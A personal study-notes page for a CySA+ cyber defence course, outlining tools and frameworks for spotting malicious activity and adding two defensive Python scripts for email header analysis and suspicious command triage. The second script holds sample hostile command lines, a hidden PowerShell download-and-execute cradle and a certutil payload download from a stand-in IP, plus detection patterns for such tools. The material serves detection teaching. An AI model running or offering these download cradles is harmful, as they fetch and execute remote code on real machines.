adam's notes

Apply Tools to Identify Malicious Activity

Goals

  • Explore techniques used to identify malicious activity
  • Learn about command line tools used for domain analysis
  • Explore attack frameworks
  • Explore methods used in email analysis
  • Learn about frequently abused command line tools

Identify Malicious Activity

  • Packet Capture Tools
    • Wireshark
    • tcpdump
  • Endpoint Detection and Response (EDR)
  • Common Analysis Tools
    • Whois
    • AbuseIPDB
    • Strings Command
    • VirusTotal
  • Sandboxing for Malware Analysis
    • Sandbox
      • Sandboxing in Security Operations
      • Sandbox for Malware Analysis
    • Joe Sandbox
    • Cuckoo Sandbox
    • CrowdStrike’s Hybrid Analysis
  • Security Information and Event Management (SIEM)
    • SIEM Capabilities
  • Security Orchestration, Automation, and Response (SOAR)
    • SOAR Runbook

Attack Methodology Frameworks

  • Cyber Kill Chain
  • MITRE ATT&CK Framework
  • Diamond Model of Intrusion Analysis
  • Open Source Security Testing Methodology Manual (OSSTMM)

Techniques for Identifying Malicious Activity

  • Email Message Internet Header Analysis
  • Email Malicious Content Analysis
  • Email Security
    • Sender Policy Framework (SPF)
    • DomainKeys Identified Mail (DKIM)
    • Domain-Based Message Authentication, Reporting, and Conformance (DMARC)
    • Cousin Domains
  • Interpreting Suspicious Commands
  • Abnormal Activity
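
As an added worked example for the email analysis items above (header analysis, SPF/DKIM/DMARC alignment and cousin domains), not part of the original notes: a headers-only triage script. It assumes the receiving MTA wrote an Authentication-Results header, uses a two-label approximation of the organizational domain in place of the Public Suffix List, and runs on a constructed message that uses documentation-range domains and the IP 203.0.113.10.

```python
"""Email header triage: parse Authentication-Results, check DMARC-style
identifier alignment for SPF and DKIM, list the Received chain and flag
cousin (look-alike) domains. Added example, not from the course notes.
The message is constructed (documentation domains, IP 203.0.113.10)."""
import re
from email import message_from_string
from email.utils import parseaddr

SAMPLE_MESSAGE = """\
Return-Path: <bounce@paypa1-secure.com>
Received: from mail.paypa1-secure.com (mail.paypa1-secure.com [203.0.113.10])
\tby mx.example.org with ESMTPS id abc123
\tfor <victim@example.org>; Mon, 03 Mar 2025 10:00:00 +0000
Authentication-Results: mx.example.org;
\tspf=pass smtp.mailfrom=paypa1-secure.com;
\tdkim=pass header.d=paypa1-secure.com;
\tdmarc=fail header.from=paypal.com
From: "PayPal Support" <service@paypal.com>
Reply-To: help@paypa1-secure.com
To: victim@example.org
Subject: Action required

Please verify your account.
"""

AUTH_RE = re.compile(r"(spf|dkim|dmarc)=(\w+)((?:\s+[\w.]+=[^\s;]+)*)")
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# Digit-for-letter swaps common in cousin domains (assumed list, not exhaustive).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t"})


def domain_of(addr_header):
    """Domain part of the first address in a header value, lower-cased."""
    return parseaddr(addr_header or "")[1].rpartition("@")[2].lower()


def org_domain(domain):
    """Organizational domain, simplified to the last two labels. Real DMARC
    uses the Public Suffix List; two labels is an assumption for this example."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def parse_auth_results(msg):
    """{method: (result, {property: value})} from Authentication-Results."""
    out = {}
    for hdr in msg.get_all("Authentication-Results", []):
        for method, result, props in AUTH_RE.findall(hdr):
            out[method] = (result.lower(), dict(p.split("=", 1) for p in props.split()))
    return out


def check_alignment(msg):
    """Relaxed DMARC alignment: the SPF (smtp.mailfrom) or DKIM (d=) identifier
    must share its organizational domain with the RFC 5322 From domain."""
    auth = parse_auth_results(msg)
    from_dom = domain_of(msg.get("From"))
    spf_res, spf_props = auth.get("spf", ("none", {}))
    dkim_res, dkim_props = auth.get("dkim", ("none", {}))
    mailfrom, dkim_d = spf_props.get("smtp.mailfrom", ""), dkim_props.get("header.d", "")
    spf_ok = spf_res == "pass" and org_domain(mailfrom) == org_domain(from_dom)
    dkim_ok = dkim_res == "pass" and org_domain(dkim_d) == org_domain(from_dom)
    return {"from_domain": from_dom, "spf": (spf_res, mailfrom, spf_ok),
            "dkim": (dkim_res, dkim_d, dkim_ok), "dmarc_pass": spf_ok or dkim_ok}


def received_chain(msg):
    """Sending IPs from the Received headers, oldest hop first."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        m = IP_RE.search(hdr)
        hops.append(m.group(1) if m else None)
    return hops


def edit_distance(a, b):
    """Levenshtein distance (classic dynamic programme)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def cousin_domain(domain, brands, max_dist=1):
    """Return the brand a domain imitates (homoglyph swap, one edit, or a
    hyphenated label such as brand-secure), or None if it is the brand itself."""
    d = org_domain(domain)
    if d in brands:
        return None
    for brand in brands:
        bname = brand.split(".")[0]
        for part in d.split(".")[0].split("-"):
            if part.translate(HOMOGLYPHS) == bname or edit_distance(part, bname) <= max_dist:
                return brand
    return None


def analyze(raw, brands):
    """Headers-only triage: alignment result, Received hops and readable findings."""
    msg = message_from_string(raw)
    align = check_alignment(msg)
    findings = []
    if not align["dmarc_pass"]:
        findings.append(f"no aligned SPF/DKIM pass for From domain {align['from_domain']}")
    reply_to = domain_of(msg.get("Reply-To"))
    if reply_to and org_domain(reply_to) != org_domain(align["from_domain"]):
        findings.append(f"Reply-To domain {reply_to} differs from From domain")
    for source, dom in (("smtp.mailfrom", align["spf"][1]),
                        ("DKIM d=", align["dkim"][1]), ("Reply-To", reply_to)):
        brand = cousin_domain(dom, brands) if dom else None
        if brand:
            findings.append(f"{source} {dom} looks like a cousin of {brand}")
    return {"alignment": align, "hops": received_chain(msg), "findings": findings}


if __name__ == "__main__":
    for finding in analyze(SAMPLE_MESSAGE, {"paypal.com"})["findings"]:
        print("-", finding)
```

Run as a script it prints the findings for the constructed message. The point it makes is that spf=pass and dkim=pass on their own say nothing about the displayed From address: both authenticated identifiers belong to paypa1-secure.com, neither is aligned with paypal.com, and that misalignment is exactly what the dmarc=fail result records.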

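As a second added example, for the "Interpreting Suspicious Commands" and "Abnormal Activity" items (again not from the original notes): a small triage routine for process command lines that decodes PowerShell -EncodedCommand payloads (Base64 over UTF-16LE) and matches indicators such as hidden windows, download cradles and LOLBin downloads against both the raw and the decoded text. The sample command lines are constructed, the indicator list is illustrative rather than complete, and the alert threshold is an arbitrary choice.

```python
"""Command-line triage: decode PowerShell -EncodedCommand payloads and score
indicators of abuse. Added example, not from the course notes; the sample
command lines are constructed and the indicator list is illustrative."""
import base64
import re
import shlex

# The encoded payload is built here so the Base64 is correct by construction.
# PowerShell expects UTF-16LE text, Base64-encoded.
_PS_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
_ENC = base64.b64encode(_PS_PAYLOAD.encode("utf-16le")).decode()
SAMPLE_COMMANDS = [
    f"powershell.exe -nop -w hidden -enc {_ENC}",
    "certutil.exe -urlcache -split -f http://192.0.2.10/payload.exe C:\\Users\\Public\\p.exe",
    "cmd.exe /c whoami",
    "notepad.exe report.txt",
]

# (indicator name, case-insensitive regex). Illustrative, not a complete list.
INDICATORS = [
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("no_profile", r"-nop\b|-noprofile\b"),
    ("execution_policy_bypass", r"-ep\s+bypass|-executionpolicy\s+bypass"),
    ("download_cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer"),
    ("invoke_expression", r"\biex\b|invoke-expression"),
    ("remote_url", r"https?://"),
    ("lolbin_certutil_download", r"certutil(?:\.exe)?\s.*-urlcache"),
    ("lolbin_bitsadmin", r"bitsadmin(?:\.exe)?\s.*/transfer"),
    ("lolbin_mshta", r"mshta(?:\.exe)?\s+(?:http|javascript|vbscript)"),
    ("lolbin_regsvr32_scrobj", r"regsvr32(?:\.exe)?\s.*/i:"),
]


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload, or None if there is none.
    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc)."""
    try:
        tokens = shlex.split(cmd, posix=False)  # keep Windows backslashes intact
    except ValueError:
        tokens = cmd.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_command(cmd):
    """Score one command line; indicators are matched against the raw text
    plus any decoded payload, so encoding does not hide the cradle."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else f"{cmd} {decoded}"
    hits = [name for name, pat in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    if decoded is not None:
        hits.insert(0, "encoded_command")
    return {"command": cmd, "decoded": decoded, "indicators": hits, "score": len(hits)}


def triage_commands(commands, threshold=2):
    """Analyses at or above the threshold, highest score first."""
    results = (analyze_command(c) for c in commands)
    return sorted((r for r in results if r["score"] >= threshold), key=lambda r: -r["score"])


if __name__ == "__main__":
    for r in triage_commands(SAMPLE_COMMANDS):
        print(r["score"], r["indicators"], r["command"][:60])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The decode step matters more than the pattern list: an analyst who only greps the raw command line never sees the DownloadString cradle, so any rule set for suspicious commands has to normalise encodings first and then match.
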
Backlinks

  • D340 - Cyber Defense and Countermeasures (CySA+)

Created with Quartz v4.5.2 © 2026

  • CC BY-NC-SA
  • adamfurman.me